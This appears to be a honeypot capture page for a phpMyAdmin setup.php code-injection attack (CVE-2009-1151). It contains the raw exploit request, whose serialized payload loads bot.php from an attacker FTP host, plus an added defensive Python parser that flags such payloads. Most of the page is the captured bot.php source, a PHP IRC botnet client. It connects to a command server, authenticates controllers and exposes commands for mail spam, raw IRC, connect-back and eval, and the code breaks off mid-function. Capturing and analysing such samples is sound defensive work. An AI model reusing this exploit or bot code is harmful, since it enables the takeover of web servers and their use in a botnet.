phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker: 95.110.227.41
Dest. port: 80
Time: 05/10/2019 22:05:43
Resource(s): 1 (listed below)
Request: see below
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host41-227-110-95.serverdedicati.aruba.it
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability in its setup script (scripts/setup.php). An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the web server process, which can compromise the application and the underlying system; other attacks are also possible. phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are vulnerable. The setup script is only reachable when the setup directory was left in place after installation, which the phpMyAdmin documentation tells administrators not to do; removing or password-protecting it closes this vector regardless of version.
CVE: CVE-2009-1151
Author: Adrian "pagvac" Pastor
Plugin ID: oosheefee1baixeinief5nociu5shohh
Request
POST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 234
cookie2: $Version="1"
Host: 114.27.169.183
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://114.27.169.183/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=2e43e013731e676c3502e227ca71d7da
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=a74bbbb1ba8ffc7009b69e36bcfd6dd6&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22ftp%3A%2F%2F95%2E110%2E227%2E41%2Fbot%2Ephp%22%3B%7D%7D
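The `configuration` parameter of the body above decodes to `a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:27:"ftp://95.110.227.41/bot.php";}}`: a serialized PHP array holding one PMA_Config object whose `source` property names a file on the attacker's own host. The setup script unserializes this parameter, and the object then loads the file named by `source` as though it were the configuration file, so the remote bot.php (the resource recorded below) is fetched through PHP's URL wrappers and executed on the web server. The lowercase `te`, `connection: TE` and `cookie2` headers are typical of Perl's LWP HTTP client rather than a browser, which is consistent with a scripted exploit run. The script below is an added example for this page, not part of the honeypot or of the exploit; it reproduces the captured body as a constructed string and parses the serialized value with a small read-only parser, so the object is never handed to PHP's `unserialize()`. The `suspicious` verdict rests on one rule: a PMA_Config `source` that uses any URL wrapper scheme cannot be a legitimate configuration path.

```python
"""Decode the captured setup.php request and flag the injected PMA_Config object
without ever handing the data to PHP's unserialize()."""
from urllib.parse import parse_qs, urlsplit

# Constructed copy of the POST body from the honeypot record above.
CAPTURED_BODY = (
    "action=lay_navigation&eoltype=unix&token=a74bbbb1ba8ffc7009b69e36bcfd6dd6"
    "&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7B"
    "s%3A6%3A%22source%22%3Bs%3A27%3A%22ftp%3A%2F%2F95%2E110%2E227%2E41%2Fbot%2Ephp%22%3B%7D%7D"
)


class PhpSerialized:
    """Read-only parser for PHP serialize() output: N, b, i, d, s, a and O values.
    Objects come back as dicts carrying a "__class__" key; nothing is executed."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def _expect(self, token: bytes) -> None:
        if not self.data.startswith(token, self.pos):
            raise ValueError(f"expected {token!r} at offset {self.pos}")
        self.pos += len(token)

    def _read_until(self, stop: bytes) -> bytes:
        end = self.data.index(stop, self.pos)
        out, self.pos = self.data[self.pos:end], end + 1
        return out

    def _string(self) -> str:
        # s:<bytelen>:"<bytes>"  -- the length is a byte count, so slice, never search for the quote
        length = int(self._read_until(b":"))
        self._expect(b'"')
        raw, self.pos = self.data[self.pos:self.pos + length], self.pos + length
        self._expect(b'"')
        return raw.decode("latin-1")

    def _members(self, count: int, out: dict) -> dict:
        self._expect(b"{")
        for _ in range(count):
            key = self.parse()
            out[key] = self.parse()
        self._expect(b"}")
        return out

    def parse(self):
        tag, self.pos = self.data[self.pos:self.pos + 1], self.pos + 1
        if tag == b"N":
            self._expect(b";")
            return None
        self._expect(b":")
        if tag == b"i":
            return int(self._read_until(b";"))
        if tag == b"b":
            return self._read_until(b";") == b"1"
        if tag == b"d":
            return float(self._read_until(b";"))
        if tag == b"s":
            value = self._string()
            self._expect(b";")
            return value
        if tag == b"a":
            return self._members(int(self._read_until(b":")), {})
        if tag == b"O":
            cls = self._string()
            self._expect(b":")
            return self._members(int(self._read_until(b":")), {"__class__": cls})
        raise ValueError(f"unsupported tag {tag!r} at offset {self.pos - 1}")


def find_objects(value, found=None) -> list:
    """Collect every object (dict with __class__) nested anywhere inside a parsed value."""
    found = [] if found is None else found
    if isinstance(value, dict):
        if "__class__" in value:
            found.append(value)
        for member in value.values():
            find_objects(member, found)
    return found


def analyse_setup_request(body: str) -> dict:
    """Triage one setup.php POST body for the CVE-2009-1151 PMA_Config injection."""
    params = parse_qs(body, keep_blank_values=True)
    conf = params.get("configuration", [""])[0]
    report = {"action": params.get("action", [""])[0], "objects": [],
              "sources": [], "payload_urls": [], "suspicious": False}
    if not conf:
        return report
    parsed = PhpSerialized(conf.encode("latin-1")).parse()
    for obj in find_objects(parsed):
        report["objects"].append(obj["__class__"])
        source = obj.get("source")
        if obj["__class__"] != "PMA_Config" or not isinstance(source, str):
            continue
        report["sources"].append(source)
        # A wrapper scheme (ftp://, http://, php://, data:, ...) can only be an injection:
        # the real configuration lives on the local filesystem. Single-letter schemes are
        # left alone so a Windows drive path is not misread as a scheme.
        scheme = urlsplit(source).scheme.lower()
        if len(scheme) > 1 and scheme != "file":
            report["payload_urls"].append(source)
            report["suspicious"] = True
    return report


if __name__ == "__main__":
    print(analyse_setup_request(CAPTURED_BODY))
```

Run over a web server's access log this only works where request bodies are logged; on a honeypot like the one above the body is stored with the record, and `payload_urls` is the indicator to feed into the resource fetcher and blocklists. Local `sources` (a path rather than a URL) still deserve a look, since the 2.11 setup flow passed serialized configuration between its steps and an attacker can point `source` at any readable file on the host.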
Resource ( 1 / 1 )
MD5: 91e62db93324cf2680b117e568cf6df0
Type: text/x-php
Size: 41796
URL: ftp://95.110.227.41/bot.php
<?php
set_time_limit(0);
error_reporting(0);
echo "ok!";
class pBot
{
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36",
"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36",
"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.3",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
"Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0",
"Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
"Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
"Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
);
var $config = array("server"=>"91.134.216.27",
"port"=>"6667",
"pass"=>"",
"prefix"=>"",
"maxrand"=>"7",
"chan"=>"#MiasmaSecurityTeam",
"chan2"=>"#MiasmaSecurityTeam",
"key"=>"",
"modes"=>"+ps",
"password"=>"MiasmaSec",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost takapusi.cok)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"#-> \2Denzo Bot Status : Online and connected \2 <-# ");
$this->privmsg($this->config['chan2'],"#-> \2Denzo BOTNET By DenzelHax 2019\2 <-# ");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->privmsg($this->config['chan'],"[\2Auth\2]: welcome $nick we missed you.");
$this->log_in($host);
}
else
{
$this->privmsg($this->config['chan'],"[\2Auth\2]: Wrong password $nick please check your line 49 in uploaded phpbot");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@jatimcom.cok>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#[email protected] since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <[email protected]>",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback":
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "botvuln":
case "vuln":
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2bot\2]: #-> phpbot of Denzo BOTNET coded by Denzel <-#");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
